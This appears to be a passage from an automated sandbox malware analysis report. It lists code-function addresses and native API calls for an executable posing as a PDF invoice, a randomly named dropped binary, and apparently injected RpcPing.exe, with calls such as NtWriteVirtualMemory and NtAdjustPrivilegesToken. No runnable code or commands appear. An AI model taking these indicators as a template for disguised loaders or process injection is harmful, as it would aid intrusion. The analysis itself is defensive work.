Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52EA0 NtAdjustPrivilegesToken,	8_2_03A52EA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52E30 NtWriteVirtualMemory,	8_2_03A52E30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52DB0 NtEnumerateKey,	8_2_03A52DB0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52D00 NtSetInformationFile,	8_2_03A52D00
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52CF0 NtOpenProcess,	8_2_03A52CF0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52CC0 NtQueryVirtualMemory,	8_2_03A52CC0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52C00 NtQueryInformationProcess,	8_2_03A52C00
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A53090 NtSetValueKey,	8_2_03A53090
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A53010 NtOpenDirectoryObject,	8_2_03A53010
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A53D10 NtOpenProcessToken,	8_2_03A53D10
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A53D70 NtOpenThread,	8_2_03A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03288B30 NtReadFile,	8_2_03288B30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_032889D0 NtCreateFile,	8_2_032889D0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03288E20 NtAllocateVirtualMemory,	8_2_03288E20
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03288C20 NtDeleteFile,	8_2_03288C20
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03288CC0 NtClose,	8_2_03288CC0

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_00D6D5BC	0_2_00D6D5BC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E8350	0_2_070E8350
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E2208	0_2_070E2208
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E42E0	0_2_070E42E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E1DD0	0_2_070E1DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E3A08	0_2_070E3A08
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E1998	0_2_070E1998
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00418163	3_2_00418163
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_004030C0	3_2_004030C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_004011D0	3_2_004011D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00401A70	3_2_00401A70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040FA7A	3_2_0040FA7A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_004022F7	3_2_004022F7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040FA83	3_2_0040FA83
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00416340	3_2_00416340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00416343	3_2_00416343
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00402300	3_2_00402300
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_004024E0	3_2_004024E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040FCA3	3_2_0040FCA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040DD20	3_2_0040DD20
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040DD23	3_2_0040DD23
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0042E5F3	3_2_0042E5F3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040DE69	3_2_0040DE69
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AE01AA	3_2_01AE01AA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD41A2	3_2_01AD41A2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD81CC	3_2_01AD81CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A10100	3_2_01A10100
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ABA118	3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AA8158	3_2_01AA8158
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AB2000	3_2_01AB2000
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AE03E6	3_2_01AE03E6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A2E3F0	3_2_01A2E3F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADA352	3_2_01ADA352
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AA02C0	3_2_01AA02C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC0274	3_2_01AC0274
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AE0591	3_2_01AE0591
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A20535	3_2_01A20535
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ACE4F6	3_2_01ACE4F6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC4420	3_2_01AC4420
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD2446	3_2_01AD2446
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A1C7C0	3_2_01A1C7C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A20770	3_2_01A20770
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A44750	3_2_01A44750
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3C6E0	3_2_01A3C6E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A229A0	3_2_01A229A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AEA9A6	3_2_01AEA9A6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A36962	3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A068B8	3_2_01A068B8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A4E8F0	3_2_01A4E8F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A22840	3_2_01A22840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A2A840	3_2_01A2A840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD6BD7	3_2_01AD6BD7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADAB40	3_2_01ADAB40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A1EA80	3_2_01A1EA80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A38DBF	3_2_01A38DBF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A1ADE0	3_2_01A1ADE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A2AD00	3_2_01A2AD00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ABCD1F	3_2_01ABCD1F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC0CB5	3_2_01AC0CB5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A10CF2	3_2_01A10CF2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A20C00	3_2_01A20C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A9EFA0	3_2_01A9EFA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A12FC8	3_2_01A12FC8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A62F28	3_2_01A62F28
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A40F30	3_2_01A40F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC2F30	3_2_01AC2F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A94F40	3_2_01A94F40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A32E90	3_2_01A32E90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADCE93	3_2_01ADCE93
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADEEDB	3_2_01ADEEDB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADEE26	3_2_01ADEE26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A20E59	3_2_01A20E59
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A2B1B0	3_2_01A2B1B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AEB16B	3_2_01AEB16B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A5516C	3_2_01A5516C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A0F172	3_2_01A0F172
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD70E9	3_2_01AD70E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADF0E0	3_2_01ADF0E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ACF0CC	3_2_01ACF0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A270C0	3_2_01A270C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A6739A	3_2_01A6739A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD132D	3_2_01AD132D
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A0D34C	3_2_01A0D34C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A252A0	3_2_01A252A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC12ED	3_2_01AC12ED
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3D2F0	3_2_01A3D2F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3B2C0	3_2_01A3B2C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ABD5B0	3_2_01ABD5B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AE95C3	3_2_01AE95C3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD7571	3_2_01AD7571
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADF43F	3_2_01ADF43F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A11460	3_2_01A11460
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADF7B0	3_2_01ADF7B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD16CC	3_2_01AD16CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A65630	3_2_01A65630
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AB5910	3_2_01AB5910
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A29950	3_2_01A29950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3B950	3_2_01A3B950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A238E0	3_2_01A238E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A8D800	3_2_01A8D800
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3FB80	3_2_01A3FB80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A95BF0	3_2_01A95BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A5DBF9	3_2_01A5DBF9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADFB76	3_2_01ADFB76
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A65AA0	3_2_01A65AA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ABDAAC	3_2_01ABDAAC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AC1AA3	3_2_01AC1AA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ACDAC6	3_2_01ACDAC6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A93A6C	3_2_01A93A6C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADFA49	3_2_01ADFA49
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD7A46	3_2_01AD7A46
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A3FDC0	3_2_01A3FDC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD7D73	3_2_01AD7D73
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A23D40	3_2_01A23D40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01AD1D5A	3_2_01AD1D5A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADFCF2	3_2_01ADFCF2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A99C32	3_2_01A99C32
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADFFB1	3_2_01ADFFB1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A21F92	3_2_01A21F92
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E3FD5	3_2_019E3FD5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E3FD2	3_2_019E3FD2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01ADFF09	3_2_01ADFF09
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A29EB0	3_2_01A29EB0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F6C01	7_2_036F6C01
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F8BDE	7_2_036F8BDE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036FF27E	7_2_036FF27E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036FF27B	7_2_036FF27B
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F89BE	7_2_036F89BE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F89B5	7_2_036F89B5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_0370109E	7_2_0370109E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_0371752E	7_2_0371752E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F6DA4	7_2_036F6DA4
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F6C5E	7_2_036F6C5E
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AE03E6	8_2_03AE03E6
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A2E3F0	8_2_03A2E3F0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADA352	8_2_03ADA352
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AA02C0	8_2_03AA02C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC0274	8_2_03AC0274
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AE01AA	8_2_03AE01AA
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD41A2	8_2_03AD41A2
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD81CC	8_2_03AD81CC
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A10100	8_2_03A10100
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ABA118	8_2_03ABA118
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AA8158	8_2_03AA8158
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AB2000	8_2_03AB2000
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A1C7C0	8_2_03A1C7C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A20770	8_2_03A20770
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A44750	8_2_03A44750
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3C6E0	8_2_03A3C6E0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AE0591	8_2_03AE0591
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A20535	8_2_03A20535
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ACE4F6	8_2_03ACE4F6
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC4420	8_2_03AC4420
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD2446	8_2_03AD2446
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD6BD7	8_2_03AD6BD7
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADAB40	8_2_03ADAB40
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A1EA80	8_2_03A1EA80
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A229A0	8_2_03A229A0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AEA9A6	8_2_03AEA9A6
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A36962	8_2_03A36962
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A068B8	8_2_03A068B8
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A4E8F0	8_2_03A4E8F0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A22840	8_2_03A22840
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A2A840	8_2_03A2A840
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A9EFA0	8_2_03A9EFA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A12FC8	8_2_03A12FC8
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A62F28	8_2_03A62F28
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A40F30	8_2_03A40F30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC2F30	8_2_03AC2F30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A94F40	8_2_03A94F40
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A32E90	8_2_03A32E90
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADCE93	8_2_03ADCE93
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADEEDB	8_2_03ADEEDB
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADEE26	8_2_03ADEE26
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A20E59	8_2_03A20E59
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A38DBF	8_2_03A38DBF
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A1ADE0	8_2_03A1ADE0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A2AD00	8_2_03A2AD00
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ABCD1F	8_2_03ABCD1F
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC0CB5	8_2_03AC0CB5
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A10CF2	8_2_03A10CF2
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A20C00	8_2_03A20C00
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A6739A	8_2_03A6739A
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD132D	8_2_03AD132D
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A0D34C	8_2_03A0D34C
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A252A0	8_2_03A252A0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC12ED	8_2_03AC12ED
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3D2F0	8_2_03A3D2F0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3B2C0	8_2_03A3B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A2B1B0	8_2_03A2B1B0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AEB16B	8_2_03AEB16B
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A5516C	8_2_03A5516C
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A0F172	8_2_03A0F172
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD70E9	8_2_03AD70E9
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADF0E0	8_2_03ADF0E0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ACF0CC	8_2_03ACF0CC
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A270C0	8_2_03A270C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADF7B0	8_2_03ADF7B0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD16CC	8_2_03AD16CC
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A65630	8_2_03A65630
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ABD5B0	8_2_03ABD5B0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AE95C3	8_2_03AE95C3
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD7571	8_2_03AD7571
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADF43F	8_2_03ADF43F
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A11460	8_2_03A11460
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3FB80	8_2_03A3FB80
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A95BF0	8_2_03A95BF0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A5DBF9	8_2_03A5DBF9
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADFB76	8_2_03ADFB76
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A65AA0	8_2_03A65AA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ABDAAC	8_2_03ABDAAC
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AC1AA3	8_2_03AC1AA3
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ACDAC6	8_2_03ACDAC6
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A93A6C	8_2_03A93A6C
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADFA49	8_2_03ADFA49
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD7A46	8_2_03AD7A46
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AB5910	8_2_03AB5910
